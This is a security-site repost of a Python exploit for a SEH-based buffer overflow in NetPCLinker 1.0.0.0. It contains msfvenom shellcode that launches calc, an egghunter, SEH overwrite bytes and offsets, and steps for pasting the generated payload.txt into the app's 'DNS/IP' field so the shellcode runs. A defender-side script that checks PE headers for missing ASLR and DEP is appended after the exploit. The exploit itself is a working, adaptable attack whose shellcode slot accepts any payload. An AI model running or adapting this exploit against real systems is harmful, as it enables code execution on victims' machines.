HackDig : Dig high-quality web security articles for hackers

NetPCLinker 1.0.0.0 Buffer Overflow

2020-06-29 17:46
#!/usr/bin/python
# Exploit Title: NetPCLinker 1.0.0.0 Buffer Overflow (SEH Egghunter)
# Date: 2019-06-28
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: https://sourceforge.net/projects/netpclinker/
# Software Link: https://sourceforge.net/projects/netpclinker/files/
# Version: 1.0.0.0
# Tested on: Windows Vista SP1

'''
# Replicate Crash:
  1) Install and Run the application
  2) Go to second tab "Clients Control Panel"
  3) Press Add button
  4) Run the exploit , the exploit creates a text file named payload.txt
  5) Copy payload.txt contents into the add client dialog , "DNS/IP" field
  6) Press OK . Your shellcode will be executed by pressing OK button.
'''

#msfvenom -p windows/exec CMD=calc -f c -b "\x00\x0a\x0d\x33\x35\x36"
#Bad Characters : \x0a\x0d\x33\x35\x36
shellcode = (
"\xdb\xc4\xd9\x74\x24\xf4\x5b\xbe\x9a\x32\x43\xd2\x31\xc9\xb1"
"\x30\x83\xc3\x04\x31\x73\x14\x03\x73\x8e\xd0\xb6\x2e\x46\x96"
"\x39\xcf\x96\xf7\xb0\x2a\xa7\x37\xa6\x3f\x97\x87\xac\x12\x1b"
"\x63\xe0\x86\xa8\x01\x2d\xa8\x19\xaf\x0b\x87\x9a\x9c\x68\x86"
"\x18\xdf\xbc\x68\x21\x10\xb1\x69\x66\x4d\x38\x3b\x3f\x19\xef"
"\xac\x34\x57\x2c\x46\x06\x79\x34\xbb\xde\x78\x15\x6a\x55\x23"
"\xb5\x8c\xba\x5f\xfc\x96\xdf\x5a\xb6\x2d\x2b\x10\x49\xe4\x62"
"\xd9\xe6\xc9\x4b\x28\xf6\x0e\x6b\xd3\x8d\x66\x88\x6e\x96\xbc"
"\xf3\xb4\x13\x27\x53\x3e\x83\x83\x62\x93\x52\x47\x68\x58\x10"
"\x0f\x6c\x5f\xf5\x3b\x88\xd4\xf8\xeb\x19\xae\xde\x2f\x42\x74"
"\x7e\x69\x2e\xdb\x7f\x69\x91\x84\x25\xe1\x3f\xd0\x57\xa8\x55"
"\x27\xe5\xd6\x1b\x27\xf5\xd8\x0b\x40\xc4\x53\xc4\x17\xd9\xb1"
"\xa1\xe8\x93\x98\x83\x60\x7a\x49\x96\xec\x7d\xa7\xd4\x08\xfe"
"\x42\xa4\xee\x1e\x27\xa1\xab\x98\xdb\xdb\xa4\x4c\xdc\x48\xc4"
"\x44\xbf\x0f\x56\x04\x40")

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x65\x7a\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

nSEH = '\xEB\xAA\x90\x90' #Jump Back

# (Vista)
# PPR(ecx)  : 0x00494b67 : startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [NPL.exe]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.0 (C:\Program Files\NetPCLinker\NPL.exe)
SEH =  '\x67\x4b\x49'

offset = "RezaReza"+shellcode +'\x41'*(1199-8-len(shellcode)-len(egghunter)-50)
payload = offset+egghunter+"\x90"*50+nSEH+SEH

try:
    f=open("payload.txt","w")
    print("[+] Creating %s bytes payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
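
The module note in the exploit ("ASLR: False, Rebase: False, SafeSEH: False") is what makes a fixed handler address usable. The following is an added example, not part of the original exploit or the NetPCLinker project: a defender-side check that reads the DllCharacteristics word of a PE image and reports which header opt-ins (ASLR, DEP) are missing. The function names and the constructed sample header are assumptions for illustration; SafeSEH is recorded in the load configuration directory and is not covered here.

```python
import struct

# DllCharacteristics bits from the PE/COFF specification
DYNAMIC_BASE = 0x0040   # image opts in to ASLR
NX_COMPAT = 0x0100      # image opts in to DEP
NO_SEH = 0x0400         # image declares that it uses no SEH handlers


def dll_characteristics(image):
    """Return the DllCharacteristics word of a PE image given as bytes."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (pe_off,) = struct.unpack_from("<I", image, 0x3C)       # e_lfanew
    if image[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    opt_off = pe_off + 4 + 20                                # skip COFF file header
    (magic,) = struct.unpack_from("<H", image, opt_off)
    if magic not in (0x10B, 0x20B):                          # PE32 / PE32+
        raise ValueError("unknown optional header magic")
    # The field sits at offset 70 of the optional header in both formats.
    (flags,) = struct.unpack_from("<H", image, opt_off + 70)
    return flags


def missing_mitigations(image):
    """List the exploit mitigations the image does not opt in to."""
    flags = dll_characteristics(image)
    missing = []
    if not flags & DYNAMIC_BASE:
        missing.append("ASLR")
    if not flags & NX_COMPAT:
        missing.append("DEP")
    return missing


def sample_image(flags):
    """Constructed minimal PE32 header, just large enough to carry the flags."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<H", opt, 70, flags)
    return dos + b"PE\0\0" + b"\0" * 20 + bytes(opt)


if __name__ == "__main__":
    # Constructed input: a header with no opt-in bits set.
    print(missing_mitigations(sample_image(0)))
```

To audit a real binary, pass the bytes of the file (read in binary mode) to missing_mitigations().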


Source: cxsecurity.com/issue/WLB-2020060124
